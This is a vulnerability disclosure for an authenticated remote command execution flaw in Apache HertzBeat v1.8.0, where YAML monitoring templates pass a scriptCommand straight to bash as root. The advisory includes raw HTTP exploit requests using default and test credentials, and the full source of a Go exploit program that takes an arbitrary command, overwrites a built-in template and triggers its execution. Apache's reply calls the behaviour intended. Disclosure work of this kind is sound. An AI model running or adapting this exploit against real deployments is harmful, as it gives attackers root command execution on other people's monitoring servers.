Apache HertzBeat (v1.8.0) ScriptCollectImpl RCE

Severity: CRITICAL
Impact: Arbitrary Command Execution in Monitoring Template
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Product: https://hertzbeat.apache.org/ (v1.8.0)
    - HertzBeat is an AI-powered Open Source Observability System
Affected Component: ScriptCollectImpl.collect()
Affected Endpoint: PUT /api/apps/define/yml
Auth Required: standard user or admin
    - For testing purposes, add a new standard user called operator with the password hertzbeat.
    - Alternatively, use the admin user, with the default hertzbeat password.
Apache Response: Apache does not consider this a vulnerability; see Response from Apache below.

Author: Brett Gervasoni
Date: 2026-03-09


Vulnerability Summary

HertzBeat has a design flaw that allows arbitrary commands to be executed via the scriptCommand parameter in a template definition.

An authenticated user can overwrite any monitoring template definition via PUT /api/apps/define/yml. The define parameter of the PUT request contains raw YAML that is parsed into a Job object. When the YAML specifies protocol: script, the attacker-controlled scriptCommand string is passed directly to ProcessBuilder (bash -c "<command>") with no sanitization.

If the overwritten template has active monitoring instances, updateAppCollectJob() re-dispatches them, triggering command execution on the collector within seconds. If no instances exist, the attacker can create one via POST /api/monitor, which will cause the template to execute immediately.

The container runs as root (uid=0).

This vulnerability can be exploited by either a standard user or an admin user. The example HTTP requests and the exploit program use a standard user named operator that I created for testing.


Vulnerable Code

Sink — ScriptCollectImpl.java:74-114 — No whitelist/blacklist, direct command execution:

public void collect(CollectRep.MetricsData.Builder builder, Metrics metrics) {
    ScriptProtocol scriptProtocol = metrics.getScript();
    // ...
    if (StringUtils.hasText(scriptProtocol.getScriptCommand())) {
        switch (scriptProtocol.getScriptTool()) {
            case BASH -> processBuilder = new ProcessBuilder(
                BASH, BASH_C, scriptProtocol.getScriptCommand().trim());  // ← PAYLOAD
            // ...
        }
    }
    // ...
    Process process = processBuilder.start();  // ← EXECUTED
}
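
To make the sink's behavior concrete, here is a minimal Go sketch of the same pattern: a single string handed to a shell's -c option. It is an analogue, not HertzBeat code. The function name runViaShell and the shell parameter are assumptions for illustration; the Java sink uses bash, while the example call uses sh only so it runs on systems without bash.

```go
package main

import (
	"fmt"
	"os/exec"
	"strings"
)

// runViaShell mirrors the pattern in the sink: the whole string is passed to
// "<shell> -c" as one argument, so the shell parses every metacharacter in it.
// The shell parameter is an assumption for portability; the sink uses bash.
func runViaShell(shell, command string) (string, error) {
	out, err := exec.Command(shell, "-c", strings.TrimSpace(command)).CombinedOutput()
	return string(out), err
}

func main() {
	// "&&" is interpreted by the shell, so one string runs two commands.
	out, err := runViaShell("sh", "echo first && echo second")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Print(out) // prints "first" and "second" on separate lines
}
```

Because the string reaches the shell unmodified, redirections, pipes, and command chaining in scriptCommand all behave exactly as they would in an interactive shell.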

Blocks Common Deserialization Gadget Strings — AppController.java:55-59 — Blocks SnakeYAML gadgets, not shell commands:

private static final String[] RISKY_STR_ARR = {"ScriptEngineManager", "URLClassLoader", "!!",
        "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationContext",
        "GenericXmlApplicationContext", "GenericGroovyApplicationContext", "GroovyScriptEngine",
        "GroovyClassLoader", "GroovyShell", "ScriptEngine", "ScriptEngineFactory",
        "XmlWebApplicationContext", "ClassPathXmlApplicationContext", "MarshalOutputStream",
        "InflaterOutputStream", "FileOutputStream"};
}
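
The following Go sketch illustrates why this list does not stop the payload. It assumes the check is a plain, case-sensitive substring match over the submitted YAML; the actual matching logic in AppController is not shown above and may differ. The names riskyStrings and containsRisky are hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// riskyStrings copies the entries of RISKY_STR_ARR shown above.
var riskyStrings = []string{
	"ScriptEngineManager", "URLClassLoader", "!!",
	"ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationContext",
	"GenericXmlApplicationContext", "GenericGroovyApplicationContext", "GroovyScriptEngine",
	"GroovyClassLoader", "GroovyShell", "ScriptEngine", "ScriptEngineFactory",
	"XmlWebApplicationContext", "ClassPathXmlApplicationContext", "MarshalOutputStream",
	"InflaterOutputStream", "FileOutputStream",
}

// containsRisky assumes a plain substring match; the real check may differ.
func containsRisky(define string) bool {
	for _, s := range riskyStrings {
		if strings.Contains(define, s) {
			return true
		}
	}
	return false
}

func main() {
	gadget := "key: !!javax.script.ScriptEngineManager []"
	shell := "protocol: script\nscript:\n  scriptTool: bash\n  scriptCommand: id > /tmp/pwned\n"

	fmt.Println("gadget flagged:", containsRisky(gadget))
	fmt.Println("shell payload flagged:", containsRisky(shell))
}
```

Under that assumption, a SnakeYAML gadget string is flagged, while a script-protocol template carrying a shell command contains none of the listed strings and passes.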

Proof of Concept — Raw HTTP Requests

Replace TARGET with the HertzBeat host. These requests use the operator account (user role) that was created for testing; it is not a default account.

Step 1 — Authenticate

In this instance, I've added a new standard user with the name operator and password hertzbeat, so I'm not using an admin account.

POST /api/account/auth/form HTTP/1.1
Host: TARGET:1157
Content-Type: application/json
Content-Length: 59

{"type":1,"identifier":"operator","credential":"hertzbeat"}

The response contains data.token (a JWT), which is used as the Bearer token in the requests below.


Step 2 — Overwrite linux_script template with malicious scriptCommand

This overwrites the built-in linux_script monitoring definition. The scriptCommand field contains the attacker's payload. Any active linux_script monitors will immediately execute it.

PUT /api/apps/define/yml HTTP/1.1
Host: TARGET:1157
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcC...
Content-Type: application/json

{"define":"app: linux_script\ncategory: os\nname:\n  en-US: Linux Script\n  zh-CN: Linux Script\nparams:\n  - field: host\n    name:\n      en-US: Host\n      zh-CN: Host\n    type: host\n    required: true\nmetrics:\n  - name: basic\n    i18n:\n      en-US: Basic\n      zh-CN: Basic\n    priority: 0\n    fields:\n      - field: result\n        type: 1\n        i18n:\n          en-US: Result\n          zh-CN: Result\n    protocol: script\n    script:\n      scriptTool: bash\n      charset: UTF-8\n      scriptCommand: id > /tmp/pwned\n      parseType: multiRow\n"}

Decoded define value (the YAML that gets parsed server-side):

app: linux_script
category: os
name:
  en-US: Linux Script
  zh-CN: Linux Script
params:
  - field: host
    name:
      en-US: Host
      zh-CN: Host
    type: host
    required: true
metrics:
  - name: basic
    i18n:
      en-US: Basic
      zh-CN: Basic
    priority: 0
    fields:
      - field: result
        type: 1
        i18n:
          en-US: Result
          zh-CN: Result
    protocol: script
    script:
      scriptTool: bash
      charset: UTF-8
      scriptCommand: id > /tmp/pwned
      parseType: multiRow
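
The relationship between the decoded YAML and the JSON body can be sketched in Go as follows. The helper name encodeDefine is hypothetical. Note that Go's json.Marshal escapes ">" as \u003e by default, which decodes to the same YAML on the server; the sketch disables HTML escaping only to reproduce the literal form shown in the raw request.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"strings"
)

// encodeDefine wraps raw YAML in the {"define": "..."} body used by the request.
func encodeDefine(yamlText string) (string, error) {
	var buf bytes.Buffer
	enc := json.NewEncoder(&buf)
	enc.SetEscapeHTML(false) // keep ">" literal instead of \u003e
	if err := enc.Encode(map[string]string{"define": yamlText}); err != nil {
		return "", err
	}
	// Encode appends a trailing newline; strip it to get the bare JSON object.
	return strings.TrimSuffix(buf.String(), "\n"), nil
}

func main() {
	// A shortened YAML fragment, used here only to keep the output readable.
	yamlText := "script:\n  scriptTool: bash\n  scriptCommand: id > /tmp/pwned\n"

	body, err := encodeDefine(yamlText)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(body)
}
```

Each newline in the YAML becomes a two-character \n escape inside the JSON string, which is why the define value in the request appears as a single long line.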

Expected Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"code":0,"msg":null,"data":null}

At this point, if any linux_script monitors are active, the command id > /tmp/pwned executes promptly (within ~30 seconds). If no monitors exist, we need to create one.


Step 3 — Create a monitoring instance to trigger execution (if one is not already present)

Only needed if no linux_script monitors are active. Creating a new monitor instance will cause the template with our command to execute immediately.

POST /api/monitor HTTP/1.1
Host: TARGET:1157
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcC...
Content-Type: application/json

{"monitor":{"name":"rce-test","app":"linux_script","host":"127.0.0.1","intervals":30,"status":1},"params":[{"field":"host","paramValue":"127.0.0.1","type":1}]}

The collector immediately executes the scriptCommand from the template injected in Step 2.


Step 4 — Verify command execution

Assuming your test instance is running in Docker, you can check with:

docker exec hertzbeat cat /tmp/pwned

Expected output:

uid=0(root) gid=0(root) groups=0(root)

Exploit Program PoC

Sample output from the PoC program:

❯ go run script_command_rce.go "id > /tmp/pwned"
============================================================
 HertzBeat ScriptCollectImpl RCE
============================================================

[*] Authenticating...
[+] Got token: eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw...

[*] Overwriting linux_script template...
    PUT /api/apps/define/yml
    scriptCommand: id > /tmp/pwned
[+] Template overwritten.

[*] Creating monitor instance to trigger collection...
    POST /api/monitor with app: linux_script
[+] Monitor created.

[+] Completed. If it wasn't executed instantly, wait ~30 seconds for the collector.
[+] Command: id > /tmp/pwned

[*] Verify with (assuming it's running in docker locally):
    docker exec hertzbeat <check your payload>
❯ docker exec hertzbeat cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)

Exploit Code

Full source of script_command_rce.go:

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"math/rand"
	"net/http"
	"os"
	"strings"
)

const target = "http://localhost:1157"

type authResponse struct {
	Code int `json:"code"`
	Data struct {
		Token string `json:"token"`
	} `json:"data"`
}

type apiResponse struct {
	Code int    `json:"code"`
	Msg  string `json:"msg"`
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintf(os.Stderr, "Usage: %s <command>\n", os.Args[0])
		fmt.Fprintf(os.Stderr, "Example: %s \"id > /tmp/pwned\"\n", os.Args[0])
		os.Exit(1)
	}
	cmd := strings.Join(os.Args[1:], " ")

	fmt.Println("============================================================")
	fmt.Println(" HertzBeat ScriptCollectImpl RCE")
	fmt.Println("============================================================")
	fmt.Println()

	// Authenticate as operator (using a user role that I created, you can use admin if you want)
	fmt.Println("[*] Authenticating...")

	token, err := authenticate()
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Auth failed: %v\n", err)
		os.Exit(1)
	}

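	// Print only a prefix of the token; guard against tokens shorter than 40 bytes,
	// which would otherwise cause a slice-bounds panic.
	preview := token
	if len(preview) > 40 {
		preview = preview[:40]
	}
	fmt.Printf("[+] Got token: %s...\n\n", preview)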

	// Overwrite linux_script template with malicious scriptCommand
	fmt.Println("[*] Overwriting linux_script template...")
	fmt.Printf("    PUT /api/apps/define/yml\n")
	fmt.Printf("    scriptCommand: %s\n", cmd)

	err = putMaliciousDefine(token, cmd)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Failed to overwrite template: %v\n", err)
		os.Exit(1)
	}

	fmt.Println("[+] Template overwritten.")
	fmt.Println()

	// Create a monitoring instance to trigger execution
	fmt.Println("[*] Creating monitor instance to trigger collection...")
	fmt.Println("    POST /api/monitor with app: linux_script")

	err = createMonitor(token)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Failed to create monitor: %v\n", err)
		fmt.Println("[*] This may fail if a monitor already exists; continuing anyway...")
	} else {
		fmt.Println("[+] Monitor created.")
		fmt.Println()
	}

	// Completed — command will execute on next collection cycle
	fmt.Println("[+] Completed. If it wasn't executed instantly, wait ~30 seconds for the collector.")
	fmt.Printf("[+] Command: %s\n\n", cmd)
	fmt.Println("[*] Verify with (assuming it's running in docker locally):")
	fmt.Println("    docker exec hertzbeat <check your payload>")
}

// authenticate logs in as a standard user role that I created called "operator"
func authenticate() (string, error) {
	body := `{"type":1,"identifier":"operator","credential":"hertzbeat"}`

	resp, err := http.Post(target+"/api/account/auth/form", "application/json", bytes.NewBufferString(body))
	if err != nil {
		return "", err
	}

	defer resp.Body.Close()

	var result authResponse
	if err := json.NewDecoder(resp.Body).Decode(&result); err != nil {
		return "", err
	}

	// A zero code with an empty token is also treated as a failed login.
	if result.Code != 0 || result.Data.Token == "" {
		return "", fmt.Errorf("login rejected or token missing (code %d)", result.Code)
	}

	return result.Data.Token, nil
}

// putMaliciousDefine overwrites the linux_script app definition with a
// script-protocol template containing the attacker's command.
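func putMaliciousDefine(token, command string) error {
	// Escape backslashes and double quotes so the command stays valid inside
	// the double-quoted YAML scalar used for scriptCommand below.
	command = strings.NewReplacer(`\`, `\\`, `"`, `\"`).Replace(command)
	define := fmt.Sprintf(`app: linux_script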
category: os
name:
  en-US: Linux Script
  zh-CN: Linux Script
params:
  - field: host
    name:
      en-US: Host
      zh-CN: Host
    type: host
    required: true
metrics:
  - name: basic
    i18n:
      en-US: Basic
      zh-CN: Basic
    priority: 0
    fields:
      - field: result
        type: 1
        i18n:
          en-US: Result
          zh-CN: Result
    protocol: script
    script:
      scriptTool: bash
      charset: UTF-8
      scriptCommand: "%s && echo result done"
      parseType: multiRow
`, command)

	payload, err := json.Marshal(map[string]string{"define": define})
	if err != nil {
		return err
	}

	req, err := http.NewRequest("PUT", target+"/api/apps/define/yml", bytes.NewBuffer(payload))
	if err != nil {
		return err
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer "+token)

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}

	defer resp.Body.Close()

	respBody, _ := io.ReadAll(resp.Body)

	var result apiResponse
	if err := json.Unmarshal(respBody, &result); err != nil {
		return fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody))
	}

	if result.Code != 0 {
		return fmt.Errorf("API error (code %d): %s", result.Code, result.Msg)
	}

	return nil
}

// createMonitor creates a linux_script monitoring instance pointed at localhost.
// Uses a random suffix so the name is unique on repeated runs.
func createMonitor(token string) error {
	suffix := randSuffix()
	// A unique name ensures a new monitor is always created, which triggers
	// execution right away instead of waiting for an existing monitor's next cycle.
	name := fmt.Sprintf("rce-poc-%s", suffix)
	body := fmt.Sprintf(`{"monitor":{"name":"%s","app":"linux_script","host":"127.0.0.1","intervals":30,"status":1},"params":[{"field":"host","paramValue":"127.0.0.1","type":1}]}`, name)

	req, err := http.NewRequest("POST", target+"/api/monitor", bytes.NewBufferString(body))
	if err != nil {
		return err
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer "+token)

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}

	defer resp.Body.Close()

	respBody, _ := io.ReadAll(resp.Body)
	var result apiResponse
	if err := json.Unmarshal(respBody, &result); err != nil {
		return fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody))
	}

	if result.Code != 0 {
		return fmt.Errorf("API error (code %d): %s", result.Code, result.Msg)
	}
	return nil
}

func randSuffix() string {
	const chars = "abcdefghijklmnopqrstuvwxyz0123456789"
	b := make([]byte, 8)

	for i := range b {
		b[i] = chars[rand.Intn(len(chars))]
	}

	return string(b)
}

Notes


Response from Apache

Official response from Apache Security Team:

As documented in HertzBeat's security model at https://hertzbeat.apache.org/docs/help/security_model, this is expected, intended functionality: it is up to the operator to make sure only trusted users are given access to HertzBeat. Customization is a feature, and users are responsible for their own custom templates. It's expected that any authenticated user is trusted with admin capabilities.

The permission model in HertzBeat has not been finished yet, though the product has shipped. See the HertzBeat Security Model documentation for details.

This is what Apache had to say about role-based permissions:

Please note that the role permission function is being improved, please do not use roles to control user permissions, all users have management permissions

Reporting Timeline